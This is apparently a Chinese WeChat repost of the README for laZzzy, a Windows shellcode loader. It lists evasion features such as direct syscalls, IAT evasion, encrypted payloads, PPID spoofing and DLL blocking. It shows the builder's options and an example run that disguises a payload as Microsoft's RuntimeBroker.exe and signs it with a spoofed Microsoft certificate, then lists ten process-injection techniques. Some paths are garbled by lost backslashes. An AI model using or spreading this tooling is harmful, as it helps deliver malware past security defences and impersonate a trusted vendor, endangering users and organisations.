特征
-
直接系统调用和本机 (
Nt*) 函数(不是所有函数,但大多数) -
导入地址表 (IAT) 规避
-
加密有效负载(XOR 和 AES)
-
随机生成的密钥
-
x90使用 NOPS ( )自动填充有效负载(如有必要) -
有效负载的逐字节内存解密
-
XOR 加密字符串
-
PPID欺骗
-
阻止非 Microsoft 签名的 DLL
-
(可选)克隆PE图标和属性
-
(可选)使用欺骗性证书进行代码签名
带有 Visual Studio 和以下组件的 Windows 机器,可以从Visual Studio Installer>Individual Components安装:
-
C++ Clang Compiler for WindowsandC++ Clang-cl for build tools
ClickOnce Publishing
(venv)PSC:MalDevlaZzzy>python3.builder.py-h⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣤⣤⠀⢀⣼⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠀⠀⢀⣀⣀⡀⠀⠀⠀⢀⣀⣀⣀⣀⣀⡀⠀⢀⣼⡿⠁⠀⠛⠛⠒⠒⢀⣀⡀⠀⠀⠀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⣰⣾⠟⠋⠙⢻⣿⠀⠀⠛⠛⢛⣿⣿⠏⠀⣠⣿⣯⣤⣤⠄⠀⠀⠀⠀⠈⢿⣷⡀⠀⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⣿⣯⠀⠀⠀⢸⣿⠀⠀⠀⣠⣿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣧⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠙⠿⣷⣦⣴⢿⣿⠄⢀⣾⣿⣿⣶⣶⣶⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀by:CaptMeelo⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠀⠀⠀usage:builder.py[-h]-s-p-m[-tp][-sp][-pp][-b][-d]options:-h,--helpshowthishelpmessageandexit-spathtorawshellcode-ppassword-mshellcodeexecutionmethod(e.g. 1)-tpprocesstoinject(e.g.svchost.exe)-spprocesstospawn(e.g.C:\Windows\System32\RuntimeBroker.exe)-ppparentprocesstospoof(e.g.explorer.exe)-bbinarytospoofmetadata(e.g.C:\Windows\System32\RuntimeBroker.exe)-ddomaintospoof(e.g.www.microsoft.com)shellcodeexecutionmethod:1Early-birdAPCQueue(requiressacrificialproces)2ThreadHijacking(requiressacrificialproces)3KernelCallbackTable(requiressacrificialprocessthathasGUI)4SectionViewMapping5ThreadSuspension6LineDDACallback7EnumSystemGeoIDCallback8FLSCallback9SetTimer10Clipboard
例子:
执行builder.py并提供必要的数据
(venv) PS C:MalDevlaZzzy> python3 .builder.py -s .calc.bin -p CaptMeelo -m1-pp explorer.exe -sp C:\Windows\System32\notepad.exe -d www.microsoft.com -b C:\Windows\System32\mmc.exe⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣤⣤⠀⢀⣼⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠀⠀⢀⣀⣀⡀⠀⠀⠀⢀⣀⣀⣀⣀⣀⡀⠀⢀⣼⡿⠁⠀⠛⠛⠒⠒⢀⣀⡀⠀⠀⠀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⣰⣾⠟⠋⠙⢻⣿⠀⠀⠛⠛⢛⣿⣿⠏⠀⣠⣿⣯⣤⣤⠄⠀⠀⠀⠀⠈⢿⣷⡀⠀⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⣿⣯⠀⠀⠀⢸⣿⠀⠀⠀⣠⣿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣧⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠙⠿⣷⣦⣴⢿⣿⠄⢀⣾⣿⣿⣶⣶⣶⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀by: CaptMeelo⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠀⠀⠀[] XOR-encrypting payload with[] Key: d3b666606468293dfa21ce2ff25e86f6[] AES-encrypting payload with[] IV: f96312f17a1a9919c74b633c5f861fe5[] Key:6c9656ed1bc50e1d5d4033479e742b4b8b2a9b2fc81fc081fc649e3fb4424fec[] Modifying templateusing[] Technique: Early-bird APC Queue[] Process to inject: None[] Process to spawn: C:\Windows\System32\RuntimeBroker.exe[] Parent process to spoof: svchost.exe[] Spoofing metadata[] Binary: C:\Windows\System32\RuntimeBroker.exe[] CompanyName: Microsoft Corporation[] FileDescription: Runtime Broker[] FileVersion:10.0.22621.608(WinBuild.160101.0800)[] InternalName: RuntimeBroker.exe[] LegalCopyright: © Microsoft Corporation. All rights reserved.[] OriginalFilename: RuntimeBroker.exe[] ProductName: Microsoft® Windows® Operating System[] ProductVersion:10.0.22621.608[] Compiling project[] Compiled executable: C:MalDevlaZzzyloaderx64ReleaselaZzzy.exe[] Signing binary with spoofed cert[] Domain: www.microsoft.com[] Version:2[] Serial:33:00:59:f8:b6:da:86:89:70:6f:fa:1b:d9:00:00:00:59:f8:b6[] Subject: /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/CN=www.microsoft.com[] Issuer: /C=US/O=Microsoft Corporation/CN=Microsoft Azure TLS Issuing CA06[] Not Before: October042022[] Not After: September292023[] PFX file: C:MalDevlaZzzyoutputwww.microsoft.com.pfx[] All done![] Output file: C:MalDevlaZzzyoutputRuntimeBroker.exe
Shellcode 执行技术
-
Early-bird APC Queue (需要牺牲过程)
-
线程劫持(需要牺牲进程)
-
KernelCallbackTable (需要具有 GUI 的牺牲进程)
-
截面视图映射
-
线程暂停
-
LineDDA回调
-
EnumSystemGeoID 回调
-
光纤本地存储 (FLS) 回调
-
设置定时器
-
剪贴板
https://github.com/capt-meelo/laZzzy
原文始发于微信公众号(橘猫学安全):laZzzy - shellcode 加载器
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论